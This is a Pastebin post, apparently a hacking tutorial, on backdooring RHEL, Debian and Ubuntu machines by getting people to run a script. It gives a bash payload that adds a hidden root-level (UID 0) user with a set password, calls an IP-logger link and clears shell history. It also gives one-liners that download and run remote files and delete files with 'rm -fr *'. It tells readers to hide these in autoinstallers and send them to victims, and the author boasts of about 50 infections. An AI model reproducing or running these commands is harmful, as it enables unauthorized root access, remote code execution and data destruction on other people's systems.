Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [UPDATED 10/26/2020]
- ██████╗░░█████╗░░█████╗░██╗░░██╗██████╗░░█████╗░░█████╗░██████╗░██╗███╗░░██╗░██████╗░
- ██╔══██╗██╔══██╗██╔══██╗██║░██╔╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║████╗░██║██╔════╝░
- ██████╦╝███████║██║░░╚═╝█████═╝░██║░░██║██║░░██║██║░░██║██████╔╝██║██╔██╗██║██║░░██╗░
- ██╔══██╗██╔══██║██║░░██╗██╔═██╗░██║░░██║██║░░██║██║░░██║██╔══██╗██║██║╚████║██║░░╚██╗
- ██████╦╝██║░░██║╚█████╔╝██║░╚██╗██████╔╝╚█████╔╝╚█████╔╝██║░░██║██║██║░╚███║╚██████╔╝
- ╚═════╝░╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝╚═════╝░░╚════╝░░╚════╝░╚═╝░░╚═╝╚═╝╚═╝░░╚══╝░╚═════╝░
- [*] This tutorial is going to show you how to successfully backdoor RHEL,debian, ubuntu machines.
- [0x1 - Introduction]
- This is a very simple method, some people might know about it some may not, what makes this method so effective is human mistakes. A lot of people can't read code or just completely skip over
- the infect line! I've infected atleast 50 boxes in a week. It's pretty effective! http://prntscr.com/fc1a2g http://prntscr.com/fc1cbx http://prntscr.com/fc1cfz
- [0x2 - Credits]
- Website: http://leakedfiles.org/
- Pastebin: https://www.instagram.com/jihadi4potus/
- Twitter: https://twitter.com/Jihadi4Potus
- Instagram: https://www.instagram.com/jihadi4potus/
- Discord: https://discord.gg/JQW3rpQ
- [0x3 - Requirements]
- 1x Brain
- 1x Domain
- 1x VPS server
- [0x4 - Begin]
- 1) Go to [Namecheap.com or dot.tk] and register a domain, the link your vps hosting to the domain.
- [Commands]
- [RHEL Machines]
- yum update -y && yum install httpd php wget curl nano -y && service iptables stop && chkconfig iptables off
- [Ubuntu/Deb]
- apt update && apt upgrade && sudo apt install apache2 php wget curl nano && service firewalld stop && chkconfig firewalld off
- 2) Go to http://blasze.tk and make an logger link, once you have this save the tracking url!
- 3) Go to your /var/www/html directory [cd /var/www/html], make a file, name it whatever you want. [touch .a] Edit your file and edit the following ->
- #!/bin/bash
- useradd -o -u 0 -g 0 -M -d /root -s /bin/bash USERNAME; echo -e "PASSWORD\nPASSWORD" | passwd USERNAME; wget -q -O /tmp/... http://blasze logger link here!; clear; history -c
- 4) Set your sh file with executing permissions [chmod +x file.sh]
- 5) Now for your payload should look something like this:
- wget -q http://files.org/file -O .l; chmod +x FILE; nohup ./FILE </dev/null/ >/dev/null 2>&1
- or
- cd /tmp; wget http://site.com/script.sh -O a.sh; sh a.sh; rm -fr *; clear; history -c
- 6) Congratz! You've setup your backdoor! Now send your payload to people or hide it in a autoinstaller and wait for the ips to come in! The ips will show up on your blasze.tk/track/
Add Comment
Please, Sign In to add comment